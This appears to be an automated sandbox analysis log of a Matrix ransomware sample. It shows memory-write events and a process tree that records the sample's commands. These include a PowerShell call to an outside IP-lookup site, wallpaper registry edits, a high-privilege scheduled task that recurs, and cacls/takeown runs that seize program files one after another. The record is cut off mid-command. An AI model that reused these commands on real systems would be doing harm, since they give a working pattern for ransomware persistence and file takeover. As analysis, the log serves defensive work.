cmd.exe 618 PID 656 wrote to memory of 920 656 cmd.exe 618 PID 656 wrote to memory of 920 656 cmd.exe 618 PID 656 wrote to memory of 920 656 cmd.exe 618 PID 656 wrote to memory of 1908 656 cmd.exe 619 PID 656 wrote to memory of 1908 656 cmd.exe 619 PID 656 wrote to memory of 1908 656 cmd.exe 619 PID 656 wrote to memory of 1908 656 cmd.exe 619 PID 1908 wrote to memory of 744 1908 cmd.exe 620 PID 1908 wrote to memory of 744 1908 cmd.exe 620 PID 1908 wrote to memory of 744 1908 cmd.exe 620 PID 1908 wrote to memory of 744 1908 cmd.exe 620 PID 656 wrote to memory of 1744 656 cmd.exe 621 PID 656 wrote to memory of 1744 656 cmd.exe 621 PID 656 wrote to memory of 1744 656 cmd.exe 621 PID 656 wrote to memory of 1744 656 cmd.exe 621 PID 1420 wrote to memory of 1900 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 622 PID 1420 wrote to memory of 1900 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 622 PID 1420 wrote to memory of 1900 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 622 PID 1420 wrote to memory of 1900 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 622 PID 1900 wrote to memory of 936 1900 cmd.exe 624 PID 1900 wrote to memory of 936 1900 cmd.exe 624 PID 1900 wrote to memory of 936 1900 cmd.exe 624 PID 1900 wrote to memory of 936 1900 cmd.exe 624 PID 1900 wrote to memory of 1224 1900 cmd.exe 625 PID 1900 wrote to memory of 1224 1900 cmd.exe 625 PID 1900 wrote to memory of 1224 1900 cmd.exe 625 PID 1900 wrote to memory of 1224 1900 cmd.exe 625 PID 1900 wrote to memory of 1876 1900 cmd.exe 626 PID 1900 wrote to memory of 1876 1900 cmd.exe 626 PID 1900 wrote to memory of 1876 1900 cmd.exe 626 PID 1900 wrote to memory of 1876 1900 cmd.exe 626 PID 1876 wrote to memory of 564 1876 cmd.exe 627 PID 1876 wrote to memory of 564 1876 cmd.exe 627 PID 1876 wrote to memory of 564 1876 cmd.exe 627 PID 1876 wrote to memory of 564 1876 cmd.exe 627 PID 1900 wrote to memory of 1000 1900 cmd.exe 628 PID 1900 wrote to memory of 1000 1900 cmd.exe 628 PID 1900 wrote to memory of 1000 1900 cmd.exe 628 PID 1900 wrote to memory of 1000 1900 cmd.exe 628 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 629 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 629 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 629 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 629 PID 1764 wrote to memory of 224 1764 cmd.exe 631 PID 1764 wrote to memory of 224 1764 cmd.exe 631 PID 1764 wrote to memory of 224 1764 cmd.exe 631 PID 1764 wrote to memory of 224 1764 cmd.exe 631 PID 1764 wrote to memory of 1428 1764 cmd.exe 632 PID 1764 wrote to memory of 1428 1764 cmd.exe 632 PID 1764 wrote to memory of 1428 1764 cmd.exe 632 PID 1764 wrote to memory of 1428 1764 cmd.exe 632 PID 1764 wrote to memory of 112 1764 cmd.exe 633 PID 1764 wrote to memory of 112 1764 cmd.exe 633 PID 1764 wrote to memory of 112 1764 cmd.exe 633 PID 1764 wrote to memory of 112 1764 cmd.exe 633 PID 112 wrote to memory of 1340 112 cmd.exe 634 PID 112 wrote to memory of 1340 112 cmd.exe 634 PID 112 wrote to memory of 1340 112 cmd.exe 634 PID 112 wrote to memory of 1340 112 cmd.exe 634 PID 1764 wrote to memory of 668 1764 cmd.exe 635 PID 1764 wrote to memory of 668 1764 cmd.exe 635 PID 1764 wrote to memory of 668 1764 cmd.exe 635 PID 1764 wrote to memory of 668 1764 cmd.exe 635 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 636 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 636 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 636 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 636 PID 1672 wrote to memory of 608 1672 cmd.exe 638 PID 1672 wrote to memory of 608 1672 cmd.exe 638 PID 1672 wrote to memory of 608 1672 cmd.exe 638 PID 1672 wrote to memory of 608 1672 cmd.exe 638 PID 1672 wrote to memory of 204 1672 cmd.exe 639 PID 1672 wrote to memory of 204 1672 cmd.exe 639 PID 1672 wrote to memory of 204 1672 cmd.exe 639 PID 1672 wrote to memory of 204 1672 cmd.exe 639 PID 1672 wrote to memory of 1968 1672 cmd.exe 640 PID 1672 wrote to memory of 1968 1672 cmd.exe 640 PID 1672 wrote to memory of 1968 1672 cmd.exe 640 PID 1672 wrote to memory of 1968 1672 cmd.exe 640 PID 1968 wrote to memory of 236 1968 cmd.exe 641 PID 1968 wrote to memory of 236 1968 cmd.exe 641 PID 1968 wrote to memory of 236 1968 cmd.exe 641 PID 1968 wrote to memory of 236 1968 cmd.exe 641 PID 1672 wrote to memory of 832 1672 cmd.exe 642 PID 1672 wrote to memory of 832 1672 cmd.exe 642 PID 1672 wrote to memory of 832 1672 cmd.exe 642 PID 1672 wrote to memory of 832 1672 cmd.exe 642 PID 1420 wrote to memory of 1744 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 643 PID 1420 wrote to memory of 1744 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 643 PID 1420 wrote to memory of 1744 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 643 PID 1420 wrote to memory of 1744 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 643
Processes
-
C:\Users\Admin\AppData\Local\Temp\f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe"C:\Users\Admin\AppData\Local\Temp\f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe" "C:\Users\Admin\AppData\Local\Temp\NW1gKmgI.exe"2⤵PID:1672
-
-
C:\Users\Admin\AppData\Local\Temp\NW1gKmgI.exe"C:\Users\Admin\AppData\Local\Temp\NW1gKmgI.exe" -n2⤵
- Executes dropped EXE
PID:1764
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ksV3hhPR.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\JAnIVzgd.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\JAnIVzgd.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:1144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:632
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:920
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ZCuJZpal.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ZCuJZpal.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\xkHlcj4a.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\xkHlcj4a.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2016
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:300 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH264.exeeSOQugH2.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:1192 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Modifies file permissions
PID:1764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1456 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:1728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:1428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:608 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:1568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
PID:576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:912 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:800
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1308 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1628 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵
- Loads dropped DLL
PID:1856 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵
- Modifies file permissions
PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "AUMProduct.cer" -nobanner3⤵
- Loads dropped DLL
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "AUMProduct.cer" -nobanner4⤵
- Executes dropped EXE
PID:288
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵
- Loads dropped DLL
PID:668 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵
- Modifies file permissions
PID:744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "email_all.gif" -nobanner3⤵
- Loads dropped DLL
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "email_all.gif" -nobanner4⤵
- Executes dropped EXE
PID:632
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵
- Loads dropped DLL
PID:1628 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "open_original_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:1348 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "open_original_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:1192
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵
- Loads dropped DLL
PID:1576 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵
- Modifies file permissions
PID:1392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "rss.gif" -nobanner3⤵
- Loads dropped DLL
PID:744 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "rss.gif" -nobanner4⤵
- Executes dropped EXE
PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵
- Loads dropped DLL
PID:656 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵
- Modifies file permissions
PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵
- Loads dropped DLL
PID:608 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵
- Executes dropped EXE
PID:676
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵
- Loads dropped DLL
PID:1628 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:1356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵
- Loads dropped DLL
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵
- Executes dropped EXE
PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵
- Loads dropped DLL
PID:1536 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:2012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "SY______.PFM" -nobanner3⤵
- Loads dropped DLL
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "SY______.PFM" -nobanner4⤵
- Executes dropped EXE
PID:616
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵
- Loads dropped DLL
PID:204 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵
- Loads dropped DLL
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵
- Executes dropped EXE
PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵
- Loads dropped DLL
PID:1068 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:1492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵
- Modifies file permissions
PID:744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "can129.hsp" -nobanner3⤵
- Loads dropped DLL
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "can129.hsp" -nobanner4⤵
- Executes dropped EXE
PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵
- Loads dropped DLL
PID:436 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:1348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "icudt26l.dat" -nobanner3⤵
- Loads dropped DLL
PID:536 -
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "icudt26l.dat" -nobanner4⤵
- Executes dropped EXE
PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵
- Loads dropped DLL
PID:232 -
